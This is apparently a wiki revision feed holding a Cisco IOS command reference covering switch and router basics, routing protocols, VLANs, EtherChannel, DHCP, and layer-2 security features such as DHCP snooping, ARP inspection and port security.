Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;br /&gt;
&lt;br /&gt;
= Routing =&lt;br /&gt;
&lt;br /&gt;
Routing is the process of forwarding packets between different networks using routing tables and routing protocols.&lt;br /&gt;
&lt;br /&gt;
=== Enable IP Routing (Layer 3 Switch) ===&lt;br /&gt;
Required on multilayer switches to allow routing between VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip routing&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
== Static Routing ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a Static Route ===&lt;br /&gt;
Manually define a path to a remote network.&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
Format:&lt;br /&gt;
 ip route &amp;lt;destination-network&amp;gt; &amp;lt;subnet-mask&amp;gt; &amp;lt;next-hop-ip&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure a Default Route / Default Gateway ===&lt;br /&gt;
Route used when no specific route matches the destination.&lt;br /&gt;
&lt;br /&gt;
 ip route 0.0.0.0 0.0.0.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
== Dynamic Routing ==&lt;br /&gt;
&lt;br /&gt;
Dynamic routing protocols automatically exchange routing information between routers.&lt;br /&gt;
&lt;br /&gt;
=== Configure RIP v2 ===&lt;br /&gt;
Uses hop count as metric (maximum 15 hops).&lt;br /&gt;
&lt;br /&gt;
 router rip&lt;br /&gt;
  version 2&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure EIGRP ===&lt;br /&gt;
Uses bandwidth and delay as composite metric.&lt;br /&gt;
&lt;br /&gt;
 router eigrp 100&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0 0.0.0.255&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure OSPF ===&lt;br /&gt;
Link-state protocol using cost as metric.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  network 192.168.1.0 0.0.0.255 area 0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Route Summarization ==&lt;br /&gt;
&lt;br /&gt;
Route summarization (aggregation) reduces routing table size by advertising one route that represents multiple networks.&lt;br /&gt;
&lt;br /&gt;
Example networks:&lt;br /&gt;
 192.168.0.0/24&lt;br /&gt;
 192.168.1.0/24&lt;br /&gt;
 192.168.2.0/24&lt;br /&gt;
 192.168.3.0/24&lt;br /&gt;
&lt;br /&gt;
Can be summarized as:&lt;br /&gt;
 192.168.0.0/22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (EIGRP) ===&lt;br /&gt;
Applied on the outgoing interface.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0&lt;br /&gt;
  ip summary-address eigrp 100 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (OSPF ABR) ===&lt;br /&gt;
Configured under the OSPF process (on an ABR).&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  area 0 range 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Administrative Distance ==&lt;br /&gt;
&lt;br /&gt;
Determines which route is preferred when multiple routes to the same destination exist.&lt;br /&gt;
&lt;br /&gt;
Common values:&lt;br /&gt;
 Connected – 0&lt;br /&gt;
 Static – 1&lt;br /&gt;
 EIGRP – 90&lt;br /&gt;
 OSPF – 110&lt;br /&gt;
 RIP – 120&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Show Routing Information ==&lt;br /&gt;
&lt;br /&gt;
=== View Routing Table ===&lt;br /&gt;
&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Specific Route ===&lt;br /&gt;
&lt;br /&gt;
 show ip route 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Routing Protocol Information ===&lt;br /&gt;
&lt;br /&gt;
 show ip protocols&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1115</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1115"/>
		<updated>2026-02-23T19:42:41Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Port Security */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | exclude {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode (&amp;quot;elevate to root&amp;quot;) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
 interface vlan 1&lt;br /&gt;
 interface fa0/1&lt;br /&gt;
 interface range fa0/2-3&lt;br /&gt;
 interface range fa0/2-3,g0/1&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
 no shutdown&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
 ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Default Gateway (Switch) ===&lt;br /&gt;
 ip default-gateway 192.168.0.254&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Default Route / Default Gateway (Router) ===&lt;br /&gt;
 ip route 0.0.0.0 0.0.0.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface IPv6 Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
Set the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages. &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.&lt;br /&gt;
&lt;br /&gt;
 ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Access / Trunk Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
Configures the interface as an access port and assigns it to VLAN 10.&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
Configures the interface as a trunk port using 802.1Q encapsulation.&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Trunk Allowed VLANs ===&lt;br /&gt;
Specifies which VLANs are allowed to traverse the trunk link.&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Native VLANs ===&lt;br /&gt;
Sets the native VLAN for untagged traffic on the trunk.&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Nonegotiate ===&lt;br /&gt;
Disables DTP (Dynamic Trunking Protocol) negotiation on the trunk interface.&lt;br /&gt;
 switchport nonegotiate&lt;br /&gt;
&lt;br /&gt;
== EtherChannel Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Active) ===&lt;br /&gt;
Configures interfaces to actively negotiate EtherChannel using LACP.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Passive) ===&lt;br /&gt;
Configures interfaces to respond to LACP negotiation.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode passive&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (On Mode) ===&lt;br /&gt;
Forces EtherChannel without negotiation protocol.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode on&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Access Port ===&lt;br /&gt;
Applies access configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport mode access&lt;br /&gt;
  switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Trunk ===&lt;br /&gt;
Applies trunk configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify EtherChannel ===&lt;br /&gt;
Displays EtherChannel status and summary information.&lt;br /&gt;
 show etherchannel summary&lt;br /&gt;
&lt;br /&gt;
=== Verify Port-Channel Interface ===&lt;br /&gt;
Displays detailed information about the Port-Channel interface.&lt;br /&gt;
 show interfaces port-channel 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== DHCP ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a DHCP Server on a Cisco Router ===&lt;br /&gt;
Assigns IP addresses automatically to clients on a network.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 192.168.1.1 192.168.1.10&lt;br /&gt;
! Exclude addresses that should not be assigned dynamically&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool LAN_POOL&lt;br /&gt;
 network 192.168.1.0 255.255.255.0&lt;br /&gt;
 default-router 192.168.1.1&lt;br /&gt;
 dns-server 8.8.8.8 8.8.4.4&lt;br /&gt;
 lease 7&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;excluded-address&#039;&#039;: Prevents certain IPs from being assigned (like static IPs for servers or routers).  &lt;br /&gt;
* &#039;&#039;network&#039;&#039;: Defines the subnet for DHCP clients.  &lt;br /&gt;
* &#039;&#039;default-router&#039;&#039;: Sets the gateway IP for clients.  &lt;br /&gt;
* &#039;&#039;dns-server&#039;&#039;: Specifies DNS servers for clients.  &lt;br /&gt;
* &#039;&#039;lease&#039;&#039;: Duration the IP is valid (in days).  &lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Relay (IP Helper) ===&lt;br /&gt;
Forwards DHCP requests from clients to a remote DHCP server.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface GigabitEthernet0/1&lt;br /&gt;
 ip address 192.168.1.1 255.255.255.0&lt;br /&gt;
 ip helper-address 192.168.2.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;ip helper-address&#039;&#039;: IP of the DHCP server to forward requests to.  &lt;br /&gt;
* Needed when the server is on a different subnet.  &lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Status ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip dhcp binding      ! Shows assigned IP addresses&lt;br /&gt;
show ip dhcp pool         ! Shows pool usage and statistics&lt;br /&gt;
show running-config       ! Check DHCP configuration&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Best Practices ===&lt;br /&gt;
* Exclude static IP addresses from DHCP pools.  &lt;br /&gt;
* Use &#039;&#039;DHCP relay&#039;&#039; when clients and server are on different subnets.  &lt;br /&gt;
* Monitor DHCP bindings to prevent IP conflicts.&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches or routers.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding attacks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== View status of port security on an interface ===&lt;br /&gt;
 show port-security interface f0/1&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
